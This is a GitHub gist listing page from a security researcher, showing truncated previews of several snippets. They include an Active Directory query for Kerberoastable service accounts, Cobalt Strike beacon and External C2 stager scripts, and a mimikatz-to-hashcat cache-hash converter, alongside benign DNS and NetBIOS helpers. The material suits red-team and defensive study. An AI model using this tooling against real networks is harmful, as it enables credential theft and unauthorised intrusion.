Skip to content

Instantly share code, notes, and snippets.

Avatar

@dtmsecurity dtmsecurity

View GitHub Profile
@dtmsecurity
dtmsecurity / SPNs.qds
Created Aug 14, 2020
Find user accounts with servicePrincipalName attribute set in native QDS file
View SPNs.qds
[CommonQuery]
Handler=5EE6238AC231D011891C00A024AB2DBBC1
Form=E33FEE83D957D011B93200A024AB2DBBE6
[DsQuery]
ViewMode=0413000017
EnableFilter=0000000000
[Microsoft.PropertyWell]
Items=0000000000
QueryStringLength=4500000045
QueryStringValue=2800260028006F0062006A0065006300740043006C006100730073003D007500730065007200290028006F0062006A00650063007400430061007400650067006F00720079003D0070006500720073006F006E0029002900280073006500720076006900630065005000720069006E0063006900700061006C004E0061006D0065003D002A0029000000D7
@dtmsecurity
dtmsecurity / goldfermi.py
Created Jul 27, 2020
Integrate URLs scraped from liked tweets and Notion using the unofficial API
View goldfermi.py
import urllib
from bs4 import BeautifulSoup
import tweepy
from urlextract import URLExtract
from notion.client import NotionClient
from notion.block import TodoBlock, BookmarkBlock
import os
from unshortenit import UnshortenIt
@dtmsecurity
dtmsecurity / sharpgen.cna
Created Nov 8, 2018
SharpGen Aggressor Beacon Wrapper
View sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
@dtmsecurity
dtmsecurity / getStager.py
Created Nov 8, 2018
Simple test script to get a stager from Cobalt Strike External C2
View getStager.py
import socket
import struct
def recv_frame(sock):
try:
chunk = sock.recv(4)
except:
return("")
if len(chunk) < 4:
return()
@dtmsecurity
dtmsecurity / doh_test.sh
Last active Oct 19, 2020
DNS over HTTPS (DoH) Resolver GET Test Script
View doh_test.sh
#!/bin/bash
printf "===START dns.google.com===\n"
curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
printf "\n===END dns.google.com===\n"
printf "===START cloudflare-dns.com===\n"
curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
printf "\n===END cloudflare-dns.com===\n"
printf "===START 1.1.1.1===\n"
curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
printf "\n===END 1.1.1.1===\n"
View netbios_encode.py
# Implemented the reverse of the compact answer on:
# https://stackoverflow.com/questions/1965065/encode-netbios-name-python/1965140
def netbios_encode(input_string):
return ''.join([chr((ord(c)>>4)+ord('A'))+chr((ord(c)&0xF)+ord('A')) for c in input_string])
def netbios_decode(netbios):
i = iter(netbios.upper())
try:
return ''.join([chr(((ord(c)-ord('A'))<<4)+((ord(next(i))-ord('A'))&0xF)) for c in i])
@dtmsecurity
dtmsecurity / mscache.py
Created Oct 24, 2017
Needed a dirty way to convert mimikatz output for mscache to hashcat
View mscache.py
import sys
import re
# .\hashcat64.exe -m 2100 .\inhash.txt .\rockyou.txt
if len(sys.argv[1]) > 0:
fh = open(str(sys.argv[1]),"r")
lines = fh.readlines()
fh.close()
You can’t perform that action at this time.